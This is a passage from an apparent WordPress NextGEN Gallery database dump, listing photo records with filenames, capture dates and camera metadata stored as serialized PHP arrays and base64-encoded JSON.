fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(4,'dsc07372',0,2,'dsc07372.jpg','','dsc07372','2009-12-11 18:02:00',0,0,'eyJ3aWR0aCI6MTYzMiwiaGVpZ2h0IjoxMjI0LCJmdWxsIjp7IndpZHRoIjoxNjMyLCJoZWlnaHQiOjEyMjR9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfZHNjMDczNzIuanBnIiwiZ2VuZXJhdGVkIjoiMC4yMzQzMzEwMCAxMzgwODMyNzQ1In0sImFwZXJ0dXJlIjoiRiA0IiwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjoiRFNDLVc1MCIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6IkRlY2VtYmVyIDExLCAyMDA5IDY6MDIgcG0iLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOiIxMC45IG1tIiwiaXNvIjozMjAsInNodXR0ZXJfc3BlZWQiOiIxXC80MCBzZWMiLCJmbGFzaCI6Ik5vdCBmaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWUsIm5nZzBkeW4tMjAweDIwMHg5MC0wMGYwdzAxMGMwMTByMTEwZjExMHIwMTB0MDNqcGciOnsid2lkdGgiOjIwMCwiaGVpZ2h0IjoxNTAsImZpbGVuYW1lIjoiZHNjMDczNzIuanBnLW5nZ2lkMDE0LW5nZzBkeW4tMjAweDIwMHg5MC0wMGYwdzAxMGMwMTByMTEwZjExMHIwMTB0MDNqcGcuanBnIiwiZ2VuZXJhdGVkIjoiMC40NDc2MjMwMCAxNDU2NDYzNTgwIn0sIm5nZzBkeW4tOTF4NjgtMDBmMHcwMTBjMDExcjExMGYxMTByMDEwdDAxMCI6eyJ3aWR0aCI6OTEsImhlaWdodCI6NjgsImZpbGVuYW1lIjoiZHNjMDczNzIuanBnLW5nZ2lkMDE0LW5nZzBkeW4tOTF4NjgtMDBmMHcwMTBjMDExcjExMGYxMTByMDEwdDAxMC5qcGciLCJnZW5lcmF0ZWQiOiIwLjU4ODQ1OTAwIDE0MjQ2ODM3NDAifSwibmdnMGR5bi0zMDB4MjAweDkwLTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwM2pwZyI6eyJ3aWR0aCI6MzAwLCJoZWlnaHQiOjIwMCwiZmlsZW5hbWUiOiJkc2MwNzM3Mi5qcGctbmdnaWQwMTQtbmdnMGR5bi0zMDB4MjAweDkwLTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwM2pwZy5qcGciLCJnZW5lcmF0ZWQiOiIwLjU5ODg0ODAwIDE0ODI2MzcxMzgifX0=',306,1482637138),(5,'dsc07373',0,2,'dsc07373.jpg',' ','dsc07373','2009-12-11 18:03:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc07373.jpg\";s:9:\"generated\";s:21:\"0.84045600 1380832752\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:25:\"December 11, 2009 6:03 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"6.3 mm\";s:3:\"iso\";i:100;s:13:\"shutter_speed\";s:8:\"1/40 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(6,'dsc07378',0,2,'dsc07378.jpg',' ','dsc07378','2009-12-11 18:05:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc07378.jpg\";s:9:\"generated\";s:21:\"0.99556000 1380832763\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:25:\"December 11, 2009 6:05 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"6.3 mm\";s:3:\"iso\";i:125;s:13:\"shutter_speed\";s:8:\"1/40 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(7,'dsc07379',0,2,'dsc07379.jpg',' ','dsc07379','2009-12-11 18:10:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc07379.jpg\";s:9:\"generated\";s:21:\"0.95163500 1380832772\";}s:8:\"aperture\";s:3:\"F 4\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:25:\"December 11, 2009 6:10 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:7:\"12.4 mm\";s:3:\"iso\";i:320;s:13:\"shutter_speed\";s:8:\"1/60 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(8,'dsc07382',0,2,'dsc07382.jpg',' ','dsc07382','2009-12-11 18:18:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc07382.jpg\";s:9:\"generated\";s:21:\"0.54785800 1380832779\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:25:\"December 11, 2009 6:18 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"6.3 mm\";s:3:\"iso\";i:100;s:13:\"shutter_speed\";s:8:\"1/40 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(9,'dsc07389',0,2,'dsc07389.jpg',' ','dsc07389','2009-12-11 18:30:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc07389.jpg\";s:9:\"generated\";s:21:\"0.89299300 1380832785\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:25:\"December 11, 2009 6:30 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"6.3 mm\";s:3:\"iso\";i:80;s:13:\"shutter_speed\";s:8:\"1/40 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(10,'dsc00993',0,3,'dsc00993.jpg','','dsc00993','2008-05-03 08:45:00',0,0,'eyJ3aWR0aCI6MTYzMiwiaGVpZ2h0IjoxMjI0LCJmdWxsIjp7IndpZHRoIjoxNjMyLCJoZWlnaHQiOjEyMjR9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfZHNjMDA5OTMuanBnIiwiZ2VuZXJhdGVkIjoiMC42MzkzNTMwMCAxMzgwODMyODE1In0sImFwZXJ0dXJlIjoiRiAyLjgiLCJjcmVkaXQiOmZhbHNlLCJjYW1lcmEiOiJEU0MtVzUwIiwiY2FwdGlvbiI6ZmFsc2UsImNyZWF0ZWRfdGltZXN0YW1wIjoiTWF5IDMsIDIwMDggODo0NSBhbSIsImNvcHlyaWdodCI6ZmFsc2UsImZvY2FsX2xlbmd0aCI6IjYuMyBtbSIsImlzbyI6ODAsInNodXR0ZXJfc3BlZWQiOiIxXC8xNjAgc2VjIiwiZmxhc2giOiJGaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWUsIm5nZzBkeW4tMjAweDIwMHg5MC0wMGYwdzAxMGMwMTByMTEwZjExMHIwMTB0MDNqcGciOnsid2lkdGgiOjIwMCwiaGVpZ2h0IjoxNTAsImZpbGVuYW1lIjoiZHNjMDA5OTMuanBnLW5nZ2lkMDIxMC1uZ2cwZHluLTIwMHgyMDB4OTAtMDBmMHcwMTBjMDEwcjExMGYxMTByMDEwdDAzanBnLmpwZyIsImdlbmVyYXRlZCI6IjAuMjY1MTM3MDAgMTQ1NjQ2MzU0OSJ9LCJuZ2cwZHluLTkxeDY4LTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwMTAiOnsid2lkdGgiOjkxLCJoZWlnaHQiOjY4LCJmaWxlbmFtZSI6ImRzYzAwOTkzLmpwZy1uZ2dpZDAyMTAtbmdnMGR5bi05MXg2OC0wMGYwdzAxMGMwMTFyMTEwZjExMHIwMTB0MDEwLmpwZyIsImdlbmVyYXRlZCI6IjAuOTAwMjE4MDAgMTQyNDY4MTQzNyJ9LCJuZ2cwZHluLTMwMHgyMDB4OTAtMDBmMHcwMTBjMDExcjExMGYxMTByMDEwdDAzanBnIjp7IndpZHRoIjozMDAsImhlaWdodCI6MjAwLCJmaWxlbmFtZSI6ImRzYzAwOTkzLmpwZy1uZ2dpZDAyMTAtbmdnMGR5bi0zMDB4MjAweDkwLTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwM2pwZy5qcGciLCJnZW5lcmF0ZWQiOiIwLjg3NzQ4ODAwIDE0ODI2NjU2MzcifX0=',308,1482665637),(11,'dsc00996',0,3,'dsc00996.jpg',' ','dsc00996','2008-05-03 09:22:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00996.jpg\";s:9:\"generated\";s:21:\"0.97606600 1380832830\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:19:\"May 3, 2008 9:22 am\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"6.3 mm\";s:3:\"iso\";i:80;s:13:\"shutter_speed\";s:9:\"1/320 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(12,'dsc00997',0,3,'dsc00997.jpg',' ','dsc00997','2008-05-03 09:45:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00997.jpg\";s:9:\"generated\";s:21:\"0.30550500 1380832840\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:19:\"May 3, 2008 9:45 am\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"6.3 mm\";s:3:\"iso\";i:80;s:13:\"shutter_speed\";s:9:\"1/400 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(13,'dsc013171',0,3,'dsc013171.jpg',' ','dsc013171','2009-05-03 10:18:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:20:\"thumbs_dsc013171.jpg\";s:9:\"generated\";s:21:\"0.00233300 1380832849\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:20:\"May 3, 2009 10:18 am\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"6.3 mm\";s:3:\"iso\";i:80;s:13:\"shutter_speed\";s:8:\"1/40 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(14,'dsc013081',0,4,'dsc013081.jpg','','dsc013081','2009-04-18 21:23:00',0,0,'eyJ3aWR0aCI6MTYzMiwiaGVpZ2h0IjoxMjI0LCJmdWxsIjp7IndpZHRoIjoxNjMyLCJoZWlnaHQiOjEyMjR9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfZHNjMDEzMDgxLmpwZyIsImdlbmVyYXRlZCI6IjAuMDg3NTAwMDAgMTM4MDgzMjg3MyJ9LCJhcGVydHVyZSI6IkYgMi44IiwiY3JlZGl0IjpmYWxzZSwiY2FtZXJhIjoiRFNDLVc1MCIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6IkFwcmlsIDE4LCAyMDA5IDk6MjMgcG0iLCJjb3B5cmlnaHQiOmZhbHNlLCJmb2NhbF9sZW5ndGgiOiI2LjMgbW0iLCJpc28iOjgwLCJzaHV0dGVyX3NwZWVkIjoiMVwvNDAgc2VjIiwiZmxhc2giOiJGaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRydWUsIm5nZzBkeW4tMjAweDIwMHg5MC0wMGYwdzAxMGMwMTByMTEwZjExMHIwMTB0MDNqcGciOnsid2lkdGgiOjIwMCwiaGVpZ2h0IjoxNTAsImZpbGVuYW1lIjoiZHNjMDEzMDgxLmpwZy1uZ2dpZDAyMTQtbmdnMGR5bi0yMDB4MjAweDkwLTAwZjB3MDEwYzAxMHIxMTBmMTEwcjAxMHQwM2pwZy5qcGciLCJnZW5lcmF0ZWQiOiIwLjM0MTE4MDAwIDE0NTY0NjM1NjAifSwibmdnMGR5bi05MXg2OC0wMGYwdzAxMGMwMTFyMTEwZjExMHIwMTB0MDEwIjp7IndpZHRoIjo5MSwiaGVpZ2h0Ijo2OCwiZmlsZW5hbWUiOiJkc2MwMTMwODEuanBnLW5nZ2lkMDIxNC1uZ2cwZHluLTkxeDY4LTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwMTAuanBnIiwiZ2VuZXJhdGVkIjoiMC4xNDA1MzkwMCAxNDI0NjgyOTc0In0sIm5nZzBkeW4tMzAweDIwMHg5MC0wMGYwdzAxMGMwMTFyMTEwZjExMHIwMTB0MDNqcGciOnsid2lkdGgiOjMwMCwiaGVpZ2h0IjoyMDAsImZpbGVuYW1lIjoiZHNjMDEzMDgxLmpwZy1uZ2dpZDAyMTQtbmdnMGR5bi0zMDB4MjAweDkwLTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwM2pwZy5qcGciLCJnZW5lcmF0ZWQiOiIwLjk4MDkzMjAwIDE0ODI3ODYyMDAifX0=',311,1482786200),(15,'dsc013091',0,4,'dsc013091.jpg',' ','dsc013091','2009-04-18 21:26:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:20:\"thumbs_dsc013091.jpg\";s:9:\"generated\";s:21:\"0.22060300 1380832884\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:22:\"April 18, 2009 9:26 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"6.3 mm\";s:3:\"iso\";i:100;s:13:\"shutter_speed\";s:8:\"1/40 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(16,'dsc00198',0,5,'dsc00198.jpg','','dsc00198','2007-04-28 18:58:00',0,0,'eyJ3aWR0aCI6MzA3MiwiaGVpZ2h0IjoyMzA0LCJmdWxsIjp7IndpZHRoIjozMDcyLCJoZWlnaHQiOjIzMDR9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfZHNjMDAxOTguanBnIiwiZ2VuZXJhdGVkIjoiMC4xOTcxNTQwMCAxMzgwODMzMDAzIn0sImFwZXJ0dXJlIjoiRiAzLjUiLCJjcmVkaXQiOmZhbHNlLCJjYW1lcmEiOiJEU0MtSDUiLCJjYXB0aW9uIjpmYWxzZSwiY3JlYXRlZF90aW1lc3RhbXAiOiJBcHJpbCAyOCwgMjAwNyA2OjU4IHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiMTYgbW0iLCJpc28iOjIwMCwic2h1dHRlcl9zcGVlZCI6IjFcLzEwIHNlYyIsImZsYXNoIjoiRmlyZWQiLCJ0aXRsZSI6IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiLCJrZXl3b3JkcyI6ZmFsc2UsInNhdmVkIjp0cnVlLCJuZ2cwZHluLTIwMHgyMDB4OTAtMDBmMHcwMTBjMDEwcjExMGYxMTByMDEwdDAzanBnIjp7IndpZHRoIjoyMDAsImhlaWdodCI6MTUwLCJmaWxlbmFtZSI6ImRzYzAwMTk4LmpwZy1uZ2dpZDAyMTYtbmdnMGR5bi0yMDB4MjAweDkwLTAwZjB3MDEwYzAxMHIxMTBmMTEwcjAxMHQwM2pwZy5qcGciLCJnZW5lcmF0ZWQiOiIwLjI1ODExNjAwIDE0NTY0NjM1NzEifSwibmdnMGR5bi05MXg2OC0wMGYwdzAxMGMwMTFyMTEwZjExMHIwMTB0MDEwIjp7IndpZHRoIjo5MSwiaGVpZ2h0Ijo2OCwiZmlsZW5hbWUiOiJkc2MwMDE5OC5qcGctbmdnaWQwMjE2LW5nZzBkeW4tOTF4NjgtMDBmMHcwMTBjMDExcjExMGYxMTByMDEwdDAxMC5qcGciLCJnZW5lcmF0ZWQiOiIwLjY5NDEyOTAwIDE0MjQ2ODE1MjQifSwibmdnMGR5bi0zMDB4MjAweDkwLTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwM2pwZyI6eyJ3aWR0aCI6MzAwLCJoZWlnaHQiOjIwMCwiZmlsZW5hbWUiOiJkc2MwMDE5OC5qcGctbmdnaWQwMjE2LW5nZzBkeW4tMzAweDIwMHg5MC0wMGYwdzAxMGMwMTFyMTEwZjExMHIwMTB0MDNqcGcuanBnIiwiZ2VuZXJhdGVkIjoiMC4zMTYxNTYwMCAxNDgyNzQ2MDg4In19',304,1482746088),(17,'dsc00199',0,5,'dsc00199.jpg',' ','dsc00199','2007-04-28 18:59:00',0,0,'a:17:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;s:4:\"full\";a:2:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00199.jpg\";s:9:\"generated\";s:21:\"0.30896400 1380833013\";}s:8:\"aperture\";s:5:\"F 3.2\";s:6:\"credit\";b:0;s:6:\"camera\";s:6:\"DSC-H5\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:22:\"April 28, 2007 6:59 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:7:\"11.1 mm\";s:3:\"iso\";i:125;s:13:\"shutter_speed\";s:8:\"1/10 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(18,'dsc00200',0,5,'dsc00200.jpg',' ','dsc00200','2007-04-28 19:19:00',0,0,'a:17:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;s:4:\"full\";a:2:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00200.jpg\";s:9:\"generated\";s:21:\"0.93862700 1380833033\";}s:8:\"aperture\";s:5:\"F 3.5\";s:6:\"credit\";b:0;s:6:\"camera\";s:6:\"DSC-H5\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:22:\"April 28, 2007 7:19 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:7:\"13.1 mm\";s:3:\"iso\";i:125;s:13:\"shutter_speed\";s:8:\"1/10 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(19,'dsc00207',0,5,'dsc00207.jpg',' ','dsc00207','2007-04-28 19:25:00',0,0,'a:17:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;s:4:\"full\";a:2:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00207.jpg\";s:9:\"generated\";s:21:\"0.99436100 1380833046\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:6:\"DSC-H5\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:22:\"April 28, 2007 7:25 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:4:\"6 mm\";s:3:\"iso\";i:125;s:13:\"shutter_speed\";s:7:\"1/0 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(20,'dsc00208',0,5,'dsc00208.jpg',' ','dsc00208','2007-04-28 19:26:00',0,0,'a:17:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;s:4:\"full\";a:2:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00208.jpg\";s:9:\"generated\";s:21:\"0.66893200 1380833068\";}s:8:\"aperture\";s:5:\"F 3.5\";s:6:\"credit\";b:0;s:6:\"camera\";s:6:\"DSC-H5\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:22:\"April 28, 2007 7:26 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:7:\"15.1 mm\";s:3:\"iso\";i:160;s:13:\"shutter_speed\";s:8:\"1/10 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(21,'dsc00214',0,5,'dsc00214.jpg',' ','dsc00214','2007-04-28 19:32:00',0,0,'a:17:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;s:4:\"full\";a:2:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00214.jpg\";s:9:\"generated\";s:21:\"0.27702500 1380833084\";}s:8:\"aperture\";s:5:\"F 3.2\";s:6:\"credit\";b:0;s:6:\"camera\";s:6:\"DSC-H5\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:22:\"April 28, 2007 7:32 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"9.8 mm\";s:3:\"iso\";i:200;s:13:\"shutter_speed\";s:8:\"1/10 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(22,'dsc00215',0,5,'dsc00215.jpg',' ','dsc00215','2007-04-28 19:40:00',0,0,'a:17:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;s:4:\"full\";a:2:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00215.jpg\";s:9:\"generated\";s:21:\"0.41680700 1380833106\";}s:8:\"aperture\";s:5:\"F 2.8\";s:6:\"credit\";b:0;s:6:\"camera\";s:6:\"DSC-H5\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:22:\"April 28, 2007 7:40 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"6.9 mm\";s:3:\"iso\";i:125;s:13:\"shutter_speed\";s:8:\"1/10 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(23,'dsc00221',0,5,'dsc00221.jpg',' ','dsc00221','2007-04-28 20:11:00',0,0,'a:17:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;s:4:\"full\";a:2:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00221.jpg\";s:9:\"generated\";s:21:\"0.07802300 1380833121\";}s:8:\"aperture\";s:5:\"F 3.2\";s:6:\"credit\";b:0;s:6:\"camera\";s:6:\"DSC-H5\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:22:\"April 28, 2007 8:11 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:7:\"11.1 mm\";s:3:\"iso\";i:125;s:13:\"shutter_speed\";s:8:\"1/10 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(24,'dsc00223',0,5,'dsc00223.jpg',' ','dsc00223','2007-04-28 21:22:00',0,0,'a:17:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;s:4:\"full\";a:2:{s:5:\"width\";i:3072;s:6:\"height\";i:2304;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc00223.jpg\";s:9:\"generated\";s:21:\"0.25942400 1380833147\";}s:8:\"aperture\";s:5:\"F 3.2\";s:6:\"credit\";b:0;s:6:\"camera\";s:6:\"DSC-H5\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:22:\"April 28, 2007 9:22 pm\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"8.4 mm\";s:3:\"iso\";i:125;s:13:\"shutter_speed\";s:8:\"1/10 sec\";s:5:\"flash\";s:5:\"Fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(63,'img_0655-1',0,10,'IMG_0655-1.JPG','','IMG_0655 (1)','2014-09-29 18:48:00',0,0,'eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MCwiZnVsbCI6eyJ3aWR0aCI6NjQwLCJoZWlnaHQiOjQ4MH0sInRodW1ibmFpbCI6eyJ3aWR0aCI6MTIwLCJoZWlnaHQiOjkwLCJmaWxlbmFtZSI6InRodW1ic19JTUdfMDY1NS0xLkpQRyIsImdlbmVyYXRlZCI6IjAuOTk1OTc1MDAgMTQxMzM0MDkzMSJ9LCJhcGVydHVyZSI6IkYgMyIsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6IkNhbm9uIFBvd2VyU2hvdCBBNDAwMCBJUyIsImNhcHRpb24iOmZhbHNlLCJjcmVhdGVkX3RpbWVzdGFtcCI6IlNlcHRlbWJlciAyOSwgMjAxNCA2OjQ4IHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiNSBtbSIsImlzbyI6NjQwLCJzaHV0dGVyX3NwZWVkIjoiMVwvNjAgc2VjIiwiZmxhc2giOiJGaXJlZCIsInRpdGxlIjoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIsImtleXdvcmRzIjpmYWxzZSwic2F2ZWQiOnRy